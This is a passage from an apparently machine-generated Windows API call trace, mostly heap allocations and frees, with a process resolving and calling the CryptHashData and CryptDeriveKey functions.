hHeap=0x970000) returned 1 [0253.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0253.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0253.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0253.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0253.507] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0253.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0253.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0253.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0253.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0253.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0253.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0253.507] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0253.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0253.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0253.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51460 [0253.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0253.508] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0253.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0253.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0253.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0253.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0253.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0253.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0253.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0253.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0253.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0253.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0253.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0253.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0253.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0253.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0253.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0253.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0253.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0253.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0253.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0253.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0253.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0253.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0253.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0253.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0253.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0253.509] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0253.509] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0253.509] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e51838, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0253.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0253.509] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0253.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0253.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0253.510] CryptHashData (hHash=0xa86f90, pbData=0x2e54ee8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0253.510] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0253.510] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0253.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0253.510] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0253.510] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0253.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55f80 | out: hHeap=0x970000) returned 1 [0253.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0253.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51700 [0253.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0253.510] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0253.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0253.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0253.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0253.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0253.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0253.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0253.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0253.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0253.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0253.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0253.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0253.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0253.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0253.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0253.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0253.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0253.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0253.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0253.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0253.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0253.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0253.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0253.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0253.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0253.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0253.511] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0253.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0253.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0253.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51790 [0253.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0253.511] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0253.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0253.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0253.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0253.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0253.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0253.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0253.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0253.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0253.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0253.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0253.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0253.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0253.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0253.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0253.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0253.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0253.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0253.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0253.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0253.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0253.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0253.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0253.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0253.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0253.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0253.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0253.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0253.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0253.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0253.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0253.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0253.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0253.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0253.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0253.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0253.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0253.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0253.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0253.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0253.513] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0253.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0253.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0253.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0253.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0253.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0253.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0253.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0253.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0253.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0253.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0253.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0253.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0253.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0253.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0253.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0253.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0253.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0253.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0253.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0253.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0253.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0253.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0253.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0253.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0253.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0253.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0253.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0253.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0253.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0253.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0253.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0253.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0253.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0253.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0253.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0253.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0253.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0253.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0253.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0253.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0253.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0253.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0253.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0253.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0253.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0253.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0253.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0253.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0253.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0253.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0253.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0253.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0253.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0253.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0253.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0253.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0253.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0253.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0253.515] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0253.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e51988 [0253.515] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e51988, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0253.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0253.515] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0253.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0253.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0253.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0253.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0253.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0253.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0253.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0253.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0253.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0253.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0253.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0253.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0253.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0253.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0253.516] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa86f90, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87050) returned 1 [0253.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0253.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0253.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0253.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0253.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0253.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0253.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0253.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0253.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0253.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0253.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0253.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0253.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0253.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0253.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0253.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0253.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0253.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0253.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0253.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0253.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0253.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0253.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0253.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0253.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0253.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0253.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0253.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0253.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0253.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0253.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0253.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0253.517] 